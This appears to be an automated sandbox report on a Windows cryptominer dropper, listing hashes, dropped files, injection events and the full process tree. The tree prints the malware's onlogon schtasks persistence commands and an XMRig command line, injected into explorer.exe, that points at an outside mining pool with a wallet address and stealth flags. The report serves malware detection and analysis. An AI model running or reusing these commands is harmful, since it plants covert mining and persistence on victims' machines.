Overview
overview
10Static
static
10076be2c09b...29.exe
windows11-21h2-x64
100fd2b5dba8...d1.exe
windows11-21h2-x64
10131d6fb920...b1.exe
windows11-21h2-x64
101c133b9bb4...fd.exe
windows11-21h2-x64
1030af8d3ec6...30.exe
windows11-21h2-x64
1041c9d28653...f5.exe
windows11-21h2-x64
105a0daa24b5...1f.exe
windows11-21h2-x64
630efa1e2d...ad.exe
windows11-21h2-x64
10651bc82076...73.exe
windows11-21h2-x64
677bea9e71...58.exe
windows11-21h2-x64
107afefba65e...bb.exe
windows11-21h2-x64
3817c226e42...db.dll
windows11-21h2-x64
8a925fc1289...42.exe
windows11-21h2-x64
7b1c5fd5c0f...ae.exe
windows11-21h2-x64
10f2923f695d...7d.msi
windows11-21h2-x64
10f58d2071a2...e1.exe
windows11-21h2-x64
7Analysis
-
max time kernel
599s -
max time network
590s -
platform
windows11-21h2_x64 -
resource
win11-20231215-en -
resource tags
arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system -
submitted
20-12-2023 01:43
Behavioral task
behavioral1
Sample
076be2c09b944ec56381f42405728f7f657d2597b6e27191354568fb70170b29.exe
Resource
win11-20231215-en
Behavioral task
behavioral2
Sample
0fd2b5dba8eb6762b397cf61bd9c2ff9de3eefc8eb8c4cbb1002d1b9c96fe5d1.exe
Resource
win11-20231215-en
Behavioral task
behavioral3
Sample
131d6fb9204ceda508075afce9b9b65e429952674e914d224268deb319a0aab1.exe
Resource
win11-20231215-en
Behavioral task
behavioral4
Sample
1c133b9bb476879df8145370ce1069ec92f28cade85a839e0159158a3e1b1afd.exe
Resource
win11-20231215-en
Behavioral task
behavioral5
Sample
30af8d3ec685a4a5669f1377bb74589772a0428d9daa214c179a795dcf4b9030.exe
Resource
win11-20231215-en
Behavioral task
behavioral6
Sample
41c9d28653704e628d8dd20e5f65a298242072156a31bc5fe0e24a1f4c640af5.exe
Resource
win11-20231215-en
Behavioral task
behavioral7
Sample
5a0daa24b5748d81ba0bb78d7f2b50eb4c387ffe679c92c1462f7dec586adb1f.exe
Resource
win11-20231215-en
Behavioral task
behavioral8
Sample
630efa1e2dc642799b867363bb36d1953884480ac29942a1ab20243a8a9620ad.exe
Resource
win11-20231215-en
Behavioral task
behavioral9
Sample
651bc82076659431e06327aeb3aacef2c30bf3cfd43ae4f9bc6b4222f15bb673.exe
Resource
win11-20231215-en
Behavioral task
behavioral10
Sample
677bea9e71aa3a56fe62a20580eb0786431a4789cb340a7294eb243054191c58.exe
Resource
win11-20231215-en
Behavioral task
behavioral11
Sample
7afefba65e72f42925ba76fae9ea98286eff7d0d01dcccd07c6117384858b6bb.exe
Resource
win11-20231215-en
Behavioral task
behavioral12
Sample
817c226e42f5c503325288fd8273bc03b326590f457e7a589eb34c2792d0a5db.dll
Resource
win11-20231215-en
Behavioral task
behavioral13
Sample
a925fc1289573f01bb86482e38340f0fe431269aa7500d776713c71091c49142.exe
Resource
win11-20231215-en
Behavioral task
behavioral14
Sample
b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe
Resource
win11-20231215-en
Behavioral task
behavioral15
Sample
f2923f695dc02132cea5c0241060dba9a35d317342675118f7b22288e78cee7d.msi
Resource
win11-20231215-en
Behavioral task
behavioral16
Sample
f58d2071a2fdaea27d814e788e002fe5da63843546f22c255eceade162323ce1.exe
Resource
win11-20231215-en
General
-
Target
b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe
-
Size
256KB
-
MD5
18d05e20731583a22b495d0d1f107c5b
-
SHA1
2ced0e3577063ca3613b43661e7df5bc1411ab09
-
SHA256
b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae
-
SHA512
36e73454b0d74088fb39dbec77c45c4106908dc80efc6a0ac8247a538345b4224f3f5e0cf6b39cf8c1687ddcee58ac2e6f24b735c9b9e277c7d064fd82e7a65a
-
SSDEEP
3072:Cf1BDZ0kVB67Duw9AMcb6FKglbz5107+i9CUVx/kvBFi4lBV5AfeNNu0NiF:C9X0GT6FKgpF107+iNDG5l5AfeNpNs
Malware Config
Signatures
-
XMRig Miner payload 16 IoCs
resource yara_rule behavioral14/memory/2040-85-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral14/memory/2040-88-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral14/memory/2040-90-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral14/memory/2040-94-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral14/memory/2040-95-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral14/memory/2040-96-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral14/memory/2040-97-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral14/memory/2040-98-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral14/memory/2040-99-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral14/memory/2040-100-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral14/memory/2040-101-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral14/memory/2040-104-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral14/memory/2040-105-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral14/memory/2040-109-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral14/memory/2040-110-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral14/memory/2040-111-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Executes dropped EXE 6 IoCs
pid Process 4596 xmrmine.exe 2880 etcmin.exe 4672 serverpatch.exe 3420 rtksmbs.exe 2980 sihost64.exe 3004 sihost32.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4672 set thread context of 2040 4672 serverpatch.exe 105 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1520 schtasks.exe 3960 schtasks.exe 1612 schtasks.exe 5104 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4596 xmrmine.exe 2880 etcmin.exe 4672 serverpatch.exe 3420 rtksmbs.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe 2040 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 684 Process not Found -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 4596 xmrmine.exe Token: SeDebugPrivilege 2880 etcmin.exe Token: SeDebugPrivilege 4672 serverpatch.exe Token: SeDebugPrivilege 3420 rtksmbs.exe Token: SeLockMemoryPrivilege 2040 explorer.exe Token: SeLockMemoryPrivilege 2040 explorer.exe -
Suspicious use of WriteProcessMemory 43 IoCs
description pid Process procid_target PID 2272 wrote to memory of 4596 2272 b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe 79 PID 2272 wrote to memory of 4596 2272 b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe 79 PID 2272 wrote to memory of 2880 2272 b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe 80 PID 2272 wrote to memory of 2880 2272 b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe 80 PID 4596 wrote to memory of 5052 4596 xmrmine.exe 87 PID 4596 wrote to memory of 5052 4596 xmrmine.exe 87 PID 2880 wrote to memory of 4760 2880 etcmin.exe 89 PID 2880 wrote to memory of 4760 2880 etcmin.exe 89 PID 5052 wrote to memory of 1520 5052 cmd.exe 91 PID 5052 wrote to memory of 1520 5052 cmd.exe 91 PID 4760 wrote to memory of 3960 4760 cmd.exe 92 PID 4760 wrote to memory of 3960 4760 cmd.exe 92 PID 4596 wrote to memory of 4672 4596 xmrmine.exe 93 PID 4596 wrote to memory of 4672 4596 xmrmine.exe 93 PID 2880 wrote to memory of 3420 2880 etcmin.exe 94 PID 2880 wrote to memory of 3420 2880 etcmin.exe 94 PID 4672 wrote to memory of 3028 4672 serverpatch.exe 96 PID 4672 wrote to memory of 3028 4672 serverpatch.exe 96 PID 3028 wrote to memory of 1612 3028 cmd.exe 98 PID 3028 wrote to memory of 1612 3028 cmd.exe 98 PID 4672 wrote to memory of 2980 4672 serverpatch.exe 99 PID 4672 wrote to memory of 2980 4672 serverpatch.exe 99 PID 3420 wrote to memory of 4244 3420 rtksmbs.exe 100 PID 3420 wrote to memory of 4244 3420 rtksmbs.exe 100 PID 3420 wrote to memory of 3004 3420 rtksmbs.exe 102 PID 3420 wrote to memory of 3004 3420 rtksmbs.exe 102 PID 4244 wrote to memory of 5104 4244 cmd.exe 104 PID 4244 wrote to memory of 5104 4244 cmd.exe 104 PID 4672 wrote to memory of 2040 4672 serverpatch.exe 105 PID 4672 wrote to memory of 2040 4672 serverpatch.exe 105 PID 4672 wrote to memory of 2040 4672 serverpatch.exe 105 PID 4672 wrote to memory of 2040 4672 serverpatch.exe 105 PID 4672 wrote to memory of 2040 4672 serverpatch.exe 105 PID 4672 wrote to memory of 2040 4672 serverpatch.exe 105 PID 4672 wrote to memory of 2040 4672 serverpatch.exe 105 PID 4672 wrote to memory of 2040 4672 serverpatch.exe 105 PID 4672 wrote to memory of 2040 4672 serverpatch.exe 105 PID 4672 wrote to memory of 2040 4672 serverpatch.exe 105 PID 4672 wrote to memory of 2040 4672 serverpatch.exe 105 PID 4672 wrote to memory of 2040 4672 serverpatch.exe 105 PID 4672 wrote to memory of 2040 4672 serverpatch.exe 105 PID 4672 wrote to memory of 2040 4672 serverpatch.exe 105 PID 4672 wrote to memory of 2040 4672 serverpatch.exe 105 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"C:\Users\Admin\AppData\Local\Temp\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Users\Admin\AppData\Roaming\xmrmine.exeC:\Users\Admin\AppData\Roaming\xmrmine.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'4⤵
- Creates scheduled task(s)
PID:1520
-
-
-
C:\Users\Admin\appdata\roaming\serverpatch.exe"C:\Users\Admin\appdata\roaming\serverpatch.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4672 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'5⤵
- Creates scheduled task(s)
PID:1612
-
-
-
C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"4⤵
- Executes dropped EXE
PID:2980
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2040
-
-
-
-
C:\Users\Admin\AppData\Roaming\etcmin.exeC:\Users\Admin\AppData\Roaming\etcmin.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'4⤵
- Creates scheduled task(s)
PID:3960
-
-
-
C:\Users\Admin\appdata\roaming\rtksmbs.exe"C:\Users\Admin\appdata\roaming\rtksmbs.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3420 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:4244 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'5⤵
- Creates scheduled task(s)
PID:5104
-
-
-
C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"4⤵
- Executes dropped EXE
PID:3004
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD5f20a5085dbb85927b25ed46a45fe0a13
SHA141b351e45a7be1d6c6c6918ee65b00f5d69ff787
SHA256370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235
SHA5124cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f
-
Filesize
8KB
MD5e149663730c0b03c8936baffe9645bb4
SHA1c0fb146c35d48481df4149027953e4ab7be59e95
SHA25633225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469
SHA512553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe
-
Filesize
147KB
MD5406f2550d0d4b9b3e2f47994076e8b8b
SHA101ab414c9d14ef6a10cd1f3c815e2d63ace18822
SHA2564805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
SHA51273b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
-
Filesize
155KB
MD5973037113a1f50e0ca79d3cc42a5ef66
SHA178235c164ebfa47d613a100abf5c64bed10c1036
SHA256a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
SHA512d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32